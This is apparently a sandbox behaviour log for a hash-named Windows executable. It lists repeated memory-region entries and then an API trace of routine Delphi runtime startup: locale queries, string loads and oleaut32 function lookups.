region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 721 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 722 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 723 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 724 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 725 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 726 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 727 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 728 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 729 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 730 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 731 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 732 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 733 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 734 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 735 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 736 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 737 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 738 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 739 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 740 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 741 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 742 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 743 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 744 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 745 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 746 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 747 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 748 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 749 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 750 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 751 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 752 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 753 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 754 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 755 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 756 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 757 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 758 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 759 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 760 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 761 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 762 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 763 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 764 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 765 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 766 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 767 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 769 start_va = 0x50480000 end_va = 0x504aefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000050480000" filename = "" Thread: id = 1 os_tid = 0x13b0 [0091.271] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0091.277] GetKeyboardType (nTypeFlag=0) returned 7 [0091.393] GetKeyboardType (nTypeFlag=1) returned 0 [0091.393] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\f28fc7b2cb76f0a714ef1e43b37ec0f5aa6c497d25d7de4379e8e0b91913d1c0.exe\" " [0091.393] GetStartupInfoA (in: lpStartupInfo=0x19feec | out: lpStartupInfo=0x19feec*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\f28fc7b2cb76f0a714ef1e43b37ec0f5aa6c497d25d7de4379e8e0b91913d1c0.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0091.393] GetVersion () returned 0x23f00206 [0091.393] GetVersion () returned 0x23f00206 [0091.393] GetCurrentThreadId () returned 0x13b0 [0091.393] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x19edd8, nSize=0x105 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\f28fc7b2cb76f0a714ef1e43b37ec0f5aa6c497d25d7de4379e8e0b91913d1c0.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\f28fc7b2cb76f0a714ef1e43b37ec0f5aa6c497d25d7de4379e8e0b91913d1c0.exe")) returned 0x62 [0091.393] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x19ecaf, nSize=0x105 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\f28fc7b2cb76f0a714ef1e43b37ec0f5aa6c497d25d7de4379e8e0b91913d1c0.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\f28fc7b2cb76f0a714ef1e43b37ec0f5aa6c497d25d7de4379e8e0b91913d1c0.exe")) returned 0x62 [0091.393] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19edc8 | out: phkResult=0x19edc8*=0x0) returned 0x2 [0091.394] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19edc8 | out: phkResult=0x19edc8*=0x0) returned 0x2 [0091.394] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19edc8 | out: phkResult=0x19edc8*=0x0) returned 0x2 [0091.394] lstrcpynA (in: lpString1=0x19ecaf, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\f28fc7b2cb76f0a714ef1e43b37ec0f5aa6c497d25d7de4379e8e0b91913d1c0.exe", iMaxLength=261 | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\f28fc7b2cb76f0a714ef1e43b37ec0f5aa6c497d25d7de4379e8e0b91913d1c0.exe") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\f28fc7b2cb76f0a714ef1e43b37ec0f5aa6c497d25d7de4379e8e0b91913d1c0.exe" [0091.394] GetThreadLocale () returned 0x409 [0091.394] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x19edc3, cchData=5 | out: lpLCData="ENU") returned 4 [0091.395] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\f28fc7b2cb76f0a714ef1e43b37ec0f5aa6c497d25d7de4379e8e0b91913d1c0.exe") returned 98 [0091.395] lstrcpynA (in: lpString1=0x19ed0e, lpString2="ENU", iMaxLength=166 | out: lpString1="ENU") returned="ENU" [0091.395] LoadLibraryExA (lpLibFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\f28fc7b2cb76f0a714ef1e43b37ec0f5aa6c497d25d7de4379e8e0b91913d1c0.ENU", hFile=0x0, dwFlags=0x2) returned 0x0 [0091.395] lstrcpynA (in: lpString1=0x19ed0e, lpString2="EN", iMaxLength=166 | out: lpString1="EN") returned="EN" [0091.395] LoadLibraryExA (lpLibFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\f28fc7b2cb76f0a714ef1e43b37ec0f5aa6c497d25d7de4379e8e0b91913d1c0.EN", hFile=0x0, dwFlags=0x2) returned 0x0 [0091.396] LoadStringA (in: hInstance=0x400000, uID=0xffcd, lpBuffer=0x19ef0c, cchBufferMax=4096 | out: lpBuffer="Exception in safecall method") returned 0x1c [0091.396] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x671ae8 [0091.396] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x2210000 [0091.397] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x672ae8 [0091.397] VirtualAlloc (lpAddress=0x2210000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2210000 [0091.397] LoadStringA (in: hInstance=0x400000, uID=0xffcc, lpBuffer=0x19ef0c, cchBufferMax=4096 | out: lpBuffer="Interface not supported") returned 0x17 [0091.397] LoadStringA (in: hInstance=0x400000, uID=0xffca, lpBuffer=0x19ef0c, cchBufferMax=4096 | out: lpBuffer="External exception %x") returned 0x15 [0091.397] LoadStringA (in: hInstance=0x400000, uID=0xffcb, lpBuffer=0x19ef0c, cchBufferMax=4096 | out: lpBuffer="Assertion failed") returned 0x10 [0091.397] LoadStringA (in: hInstance=0x400000, uID=0xffd9, lpBuffer=0x19ef0c, cchBufferMax=4096 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0091.398] LoadStringA (in: hInstance=0x400000, uID=0xffc6, lpBuffer=0x19ef0c, cchBufferMax=4096 | out: lpBuffer="Invalid argument") returned 0x10 [0091.398] LoadStringA (in: hInstance=0x400000, uID=0xffd8, lpBuffer=0x19ef0c, cchBufferMax=4096 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0091.398] LoadStringA (in: hInstance=0x400000, uID=0xffd4, lpBuffer=0x19ef0c, cchBufferMax=4096 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0091.398] LoadStringA (in: hInstance=0x400000, uID=0xffdc, lpBuffer=0x19ef0c, cchBufferMax=4096 | out: lpBuffer="Invalid variant operation") returned 0x19 [0091.398] LoadStringA (in: hInstance=0x400000, uID=0xffdb, lpBuffer=0x19ef0c, cchBufferMax=4096 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0091.398] LoadStringA (in: hInstance=0x400000, uID=0xffec, lpBuffer=0x19ef0c, cchBufferMax=4096 | out: lpBuffer="Stack overflow") returned 0xe [0091.398] LoadStringA (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x19ef0c, cchBufferMax=4096 | out: lpBuffer="Control-C hit") returned 0xd [0091.398] LoadStringA (in: hInstance=0x400000, uID=0xffee, lpBuffer=0x19ef0c, cchBufferMax=4096 | out: lpBuffer="Privileged instruction") returned 0x16 [0091.398] LoadStringA (in: hInstance=0x400000, uID=0xffeb, lpBuffer=0x19ef0c, cchBufferMax=4096 | out: lpBuffer="Access violation") returned 0x10 [0091.398] LoadStringA (in: hInstance=0x400000, uID=0xffe9, lpBuffer=0x19ef0c, cchBufferMax=4096 | out: lpBuffer="Invalid class typecast") returned 0x16 [0091.398] LoadStringA (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x19ef0c, cchBufferMax=4096 | out: lpBuffer="Floating point underflow") returned 0x18 [0091.398] LoadStringA (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x19ef0c, cchBufferMax=4096 | out: lpBuffer="Floating point overflow") returned 0x17 [0091.398] LoadStringA (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x19ef0c, cchBufferMax=4096 | out: lpBuffer="Floating point division by zero") returned 0x1f [0091.398] LoadStringA (in: hInstance=0x400000, uID=0xffe4, lpBuffer=0x19ef0c, cchBufferMax=4096 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0091.398] LoadStringA (in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x19ef0c, cchBufferMax=4096 | out: lpBuffer="Integer overflow") returned 0x10 [0091.398] LoadStringA (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x19ef0c, cchBufferMax=4096 | out: lpBuffer="Range check error") returned 0x11 [0091.398] LoadStringA (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x19ef0c, cchBufferMax=4096 | out: lpBuffer="Division by zero") returned 0x10 [0091.398] LoadStringA (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x19ef0c, cchBufferMax=4096 | out: lpBuffer="Invalid numeric input") returned 0x15 [0091.398] LoadStringA (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x19ef0c, cchBufferMax=4096 | out: lpBuffer="Disk full") returned 0x9 [0091.398] LoadStringA (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x19ef0c, cchBufferMax=4096 | out: lpBuffer="Read beyond end of file") returned 0x17 [0091.398] LoadStringA (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x19ef0c, cchBufferMax=4096 | out: lpBuffer="File access denied") returned 0x12 [0091.398] LoadStringA (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x19ef0c, cchBufferMax=4096 | out: lpBuffer="Too many open files") returned 0x13 [0091.398] LoadStringA (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x19ef0c, cchBufferMax=4096 | out: lpBuffer="Invalid filename") returned 0x10 [0091.398] LoadStringA (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x19ef0c, cchBufferMax=4096 | out: lpBuffer="File not found") returned 0xe [0091.398] LoadStringA (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x19eef8, cchBufferMax=4096 | out: lpBuffer="Out of memory") returned 0xd [0091.398] LoadStringA (in: hInstance=0x400000, uID=0xffe8, lpBuffer=0x19eef8, cchBufferMax=4096 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0091.399] GetVersionExA (in: lpVersionInformation=0x19fe90*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x19fe90*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0091.399] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76720000 [0091.399] GetProcAddress (hModule=0x76720000, lpProcName="GetDiskFreeSpaceExA") returned 0x767469d0 [0091.399] GetThreadLocale () returned 0x409 [0091.399] GetThreadLocale () returned 0x409 [0091.399] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x19fd68, cchData=256 | out: lpLCData="Jan") returned 4 [0091.399] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x19fd68, cchData=256 | out: lpLCData="January") returned 8 [0091.399] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x19fd68, cchData=256 | out: lpLCData="Feb") returned 4 [0091.399] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x19fd68, cchData=256 | out: lpLCData="February") returned 9 [0091.399] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x19fd68, cchData=256 | out: lpLCData="Mar") returned 4 [0091.399] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x19fd68, cchData=256 | out: lpLCData="March") returned 6 [0091.399] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x19fd68, cchData=256 | out: lpLCData="Apr") returned 4 [0091.399] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x19fd68, cchData=256 | out: lpLCData="April") returned 6 [0091.399] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x19fd68, cchData=256 | out: lpLCData="May") returned 4 [0091.399] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x19fd68, cchData=256 | out: lpLCData="May") returned 4 [0091.399] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x19fd68, cchData=256 | out: lpLCData="Jun") returned 4 [0091.399] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x19fd68, cchData=256 | out: lpLCData="June") returned 5 [0091.399] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x19fd68, cchData=256 | out: lpLCData="Jul") returned 4 [0091.399] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x19fd68, cchData=256 | out: lpLCData="July") returned 5 [0091.399] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x19fd68, cchData=256 | out: lpLCData="Aug") returned 4 [0091.400] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x19fd68, cchData=256 | out: lpLCData="August") returned 7 [0091.400] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x19fd68, cchData=256 | out: lpLCData="Sep") returned 4 [0091.400] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x19fd68, cchData=256 | out: lpLCData="September") returned 10 [0091.400] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x19fd68, cchData=256 | out: lpLCData="Oct") returned 4 [0091.400] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x19fd68, cchData=256 | out: lpLCData="October") returned 8 [0091.400] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x19fd68, cchData=256 | out: lpLCData="Nov") returned 4 [0091.400] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x19fd68, cchData=256 | out: lpLCData="November") returned 9 [0091.400] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x19fd68, cchData=256 | out: lpLCData="Dec") returned 4 [0091.400] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x19fd68, cchData=256 | out: lpLCData="December") returned 9 [0091.400] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x19fd68, cchData=256 | out: lpLCData="Sun") returned 4 [0091.400] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x19fd68, cchData=256 | out: lpLCData="Sunday") returned 7 [0091.400] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x19fd68, cchData=256 | out: lpLCData="Mon") returned 4 [0091.400] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x19fd68, cchData=256 | out: lpLCData="Monday") returned 7 [0091.400] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x19fd68, cchData=256 | out: lpLCData="Tue") returned 4 [0091.400] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x19fd68, cchData=256 | out: lpLCData="Tuesday") returned 8 [0091.400] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x19fd68, cchData=256 | out: lpLCData="Wed") returned 4 [0091.400] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x19fd68, cchData=256 | out: lpLCData="Wednesday") returned 10 [0091.400] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x19fd68, cchData=256 | out: lpLCData="Thu") returned 4 [0091.400] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x19fd68, cchData=256 | out: lpLCData="Thursday") returned 9 [0091.400] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x19fd68, cchData=256 | out: lpLCData="Fri") returned 4 [0091.400] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x19fd68, cchData=256 | out: lpLCData="Friday") returned 7 [0091.400] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x19fd68, cchData=256 | out: lpLCData="Sat") returned 4 [0091.400] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x19fd68, cchData=256 | out: lpLCData="Saturday") returned 9 [0091.400] GetThreadLocale () returned 0x409 [0091.400] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x19fdc4, cchData=256 | out: lpLCData="$") returned 2 [0091.400] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x19fdc4, cchData=256 | out: lpLCData="0") returned 2 [0091.400] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x19fdc4, cchData=256 | out: lpLCData="0") returned 2 [0091.400] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x19febc, cchData=2 | out: lpLCData=",") returned 2 [0091.400] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x19febc, cchData=2 | out: lpLCData=".") returned 2 [0091.400] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x19fdc4, cchData=256 | out: lpLCData="2") returned 2 [0091.400] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x19febc, cchData=2 | out: lpLCData="/") returned 2 [0091.400] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x19fdc4, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0091.400] GetThreadLocale () returned 0x409 [0091.401] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x19fd90, cchData=256 | out: lpLCData="1") returned 2 [0091.401] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x19fdc4, cchData=256 | out: lpLCData="dddd, MMMM d, yyyy") returned 19 [0091.401] GetThreadLocale () returned 0x409 [0091.401] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x19fd90, cchData=256 | out: lpLCData="1") returned 2 [0091.401] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x19febc, cchData=2 | out: lpLCData=":") returned 2 [0091.401] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x19fdc4, cchData=256 | out: lpLCData="AM") returned 3 [0091.401] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x19fdc4, cchData=256 | out: lpLCData="PM") returned 3 [0091.401] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x19fdc4, cchData=256 | out: lpLCData="0") returned 2 [0091.401] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x19fdc4, cchData=256 | out: lpLCData="0") returned 2 [0091.401] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x19fdc4, cchData=256 | out: lpLCData="0") returned 2 [0091.401] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x19febc, cchData=2 | out: lpLCData=",") returned 2 [0091.401] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x76680000 [0091.401] GetProcAddress (hModule=0x76680000, lpProcName="VariantChangeTypeEx") returned 0x76697260 [0091.401] GetProcAddress (hModule=0x76680000, lpProcName="VarNeg") returned 0x766e2470 [0091.401] GetProcAddress (hModule=0x76680000, lpProcName="VarNot") returned 0x766e36e0 [0091.401] GetProcAddress (hModule=0x76680000, lpProcName="VarAdd") returned 0x766bcbb0 [0091.401] GetProcAddress (hModule=0x76680000, lpProcName="VarSub") returned 0x766be0d0 [0091.402] GetProcAddress (hModule=0x76680000, lpProcName="VarMul") returned 0x766bd800 [0091.402] GetProcAddress (hModule=0x76680000, lpProcName="VarDiv") returned 0x766e2980 [0091.402] GetProcAddress (hModule=0x76680000, lpProcName="VarIdiv") returned 0x766e3320 [0091.402] GetProcAddress (hModule=0x76680000, lpProcName="VarMod") returned 0x766e3580 [0091.402] GetProcAddress (hModule=0x76680000, lpProcName="VarAnd") returned 0x766b3690 [0091.402] GetProcAddress (hModule=0x76680000, lpProcName="VarOr") returned 0x766e3790 [0091.404] GetProcAddress (hModule=0x76680000, lpProcName="VarXor") returned 0x766e3930 [0091.404] GetProcAddress (hModule=0x76680000, lpProcName="VarCmp") returned 0x76692ae0 [0091.405] GetProcAddress (hModule=0x76680000, lpProcName="VarI4FromStr") returned 0x76695140 [0091.405] GetProcAddress (hModule=0x76680000, lpProcName="VarR4FromStr") returned 0x766b3020 [0091.405] GetProcAddress (hModule=0x76680000, lpProcName="VarR8FromStr") returned 0x766b3cd0 [0091.405] GetProcAddress (hModule=0x76680000, lpProcName="VarDateFromStr") returned 0x766a8b20 [0091.405] GetProcAddress (hModule=0x76680000, lpProcName="VarCyFromStr") returned 0x76692280 [0091.405] GetProcAddress (hModule=0x76680000, lpProcName="VarBoolFromStr") returned 0x766944d0 [0091.405] GetProcAddress (hModule=0x76680000, lpProcName="VarBstrFromCy") returned 0x766b31c0 [0091.405] GetProcAddress (hModule=0x76680000, lpProcName="VarBstrFromDate") returned 0x766a99f0 [0091.405] GetProcAddress (hModule=0x76680000, lpProcName="VarBstrFromBool") returned 0x76694480 [0091.406] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0x20c [0091.406] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x208 [0091.406] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x210 [0091.406] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x743d0000 [0091.406] GetDC (hWnd=0x0) returned 0x40106cc [0091.406] GetDeviceCaps (hdc=0x40106cc, index=90) returned 96 [0091.406] ReleaseDC (hWnd=0x0, hDC=0x40106cc) returned 1 [0091.406] GetDC (hWnd=0x0) returned 0x40106cc [0091.406] GetDeviceCaps (hdc=0x40106cc, index=104) returned 0 